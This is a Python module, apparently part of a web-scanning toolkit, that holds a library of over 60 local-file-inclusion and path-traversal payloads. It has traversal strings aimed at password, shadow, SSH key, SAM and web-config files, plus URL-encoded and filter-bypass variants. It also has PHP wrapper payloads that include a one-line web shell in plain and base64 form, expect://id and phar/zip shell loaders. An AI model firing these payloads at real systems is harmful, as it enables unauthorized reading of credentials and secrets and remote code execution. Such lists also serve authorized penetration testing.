"""LFI/Path Traversal Payload库 - 60+ Payloads"""

LFI_BASIC = [
    "../etc/passwd",
    "../../etc/passwd",
    "../../../etc/passwd",
    "../../../../etc/passwd",
    "../../../../../etc/passwd",
    "../../../../../../etc/passwd",
    "../../../../../../../etc/passwd",
    "../../../../../../../../etc/passwd",
    "/etc/passwd",
]

LFI_LINUX = [
    "../../../../etc/passwd",
    "../../../../etc/shadow",
    "../../../../etc/hosts",
    "../../../../etc/hostname",
    "../../../../etc/issue",
    "../../../../etc/motd",
    "../../../../etc/mysql/my.cnf",
    "../../../../etc/httpd/conf/httpd.conf",
    "../../../../etc/apache2/apache2.conf",
    "../../../../etc/nginx/nginx.conf",
    "../../../../etc/ssh/sshd_config",
    "../../../../etc/crontab",
    "../../../../root/.bashrc",
    "../../../../root/.bash_history",
    "../../../../root/.ssh/id_rsa",
    "../../../../root/.ssh/authorized_keys",
    "../../../../home/*/.bashrc",
    "../../../../home/*/.bash_history",
    "../../../../proc/self/environ",
    "../../../../proc/self/cmdline",
    "../../../../proc/self/fd/0",
    "../../../../proc/version",
    "../../../../proc/net/tcp",
    "../../../../var/log/apache2/access.log",
    "../../../../var/log/apache2/error.log",
    "../../../../var/log/nginx/access.log",
    "../../../../var/log/nginx/error.log",
    "../../../../var/log/auth.log",
    "../../../../var/log/syslog",
    "../../../../var/www/html/index.php",
    "../../../../var/www/html/wp-config.php",
]

LFI_WINDOWS = [
    "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
    "..\\..\\..\\windows\\win.ini",
    "..\\..\\..\\windows\\system.ini",
    "..\\..\\..\\boot.ini",
    "..\\..\\..\\windows\\system32\\config\\SAM",
    "..\\..\\..\\windows\\system32\\config\\SYSTEM",
    "..\\..\\..\\windows\\system32\\config\\SOFTWARE",
    "..\\..\\..\\inetpub\\wwwroot\\web.config",
    "..\\..\\..\\inetpub\\logs\\LogFiles",
    "..\\..\\..\\windows\\debug\\NetSetup.log",
    "..\\..\\..\\windows\\repair\\sam",
    "..\\..\\..\\windows\\repair\\system",
    "..\\..\\..\\Users\\Administrator\\Desktop\\",
    "..\\..\\..\\Users\\Administrator\\.ssh\\id_rsa",
]

LFI_ENCODED = [
    "..%2f..%2f..%2f..%2fetc/passwd",
    "..%252f..%252f..%252f..%252fetc/passwd",
    "..%c0%af..%c0%af..%c0%afetc/passwd",
    "..%ef%bc%8f..%ef%bc%8fetc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
    "....//....//....//....//etc/passwd",
    "..../..../..../..../etc/passwd",
    "..%00/..%00/..%00/etc/passwd",
    "../../../../etc/passwd%00.jpg",
    "../../../../etc/passwd%00.png",
    "../../../../etc/passwd%00",
    "....\\....\\....\\etc/passwd",
    "..%5c..%5c..%5c..%5cetc/passwd",
    "..%255c..%255c..%255cetc/passwd",
]

LFI_FILTER_BYPASS = [
    "....//....//....//etc/passwd",
    "....///....///....///etc/passwd",
    "..././..././..././etc/passwd",
    "....\\\\....\\\\....\\\\etc/passwd",
    "..;/..;/..;/etc/passwd",
    "..%00/..%00/..%00/etc/passwd",
    "/var/www/html/../../../etc/passwd",
    "...." + "/." * 100 + "./etc/passwd",
]

PHP_WRAPPERS = [
    "php://filter/convert.base64-encode/resource=index.php",
    "php://filter/read=string.rot13/resource=index.php",
    "php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php",
    "php://filter/zlib.deflate/convert.base64-encode/resource=index.php",
    "php://input",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+",
    "data://text/plain,<?php system($_GET['c']);?>",
    "expect://id",
    "zip://shell.zip#shell.php",
    "phar://shell.phar/shell.php",
    "php://fd/0",
    "php://memory",
    "php://temp",
]

ALL_LFI = LFI_BASIC + LFI_LINUX + LFI_WINDOWS + LFI_ENCODED + LFI_FILTER_BYPASS + PHP_WRAPPERS
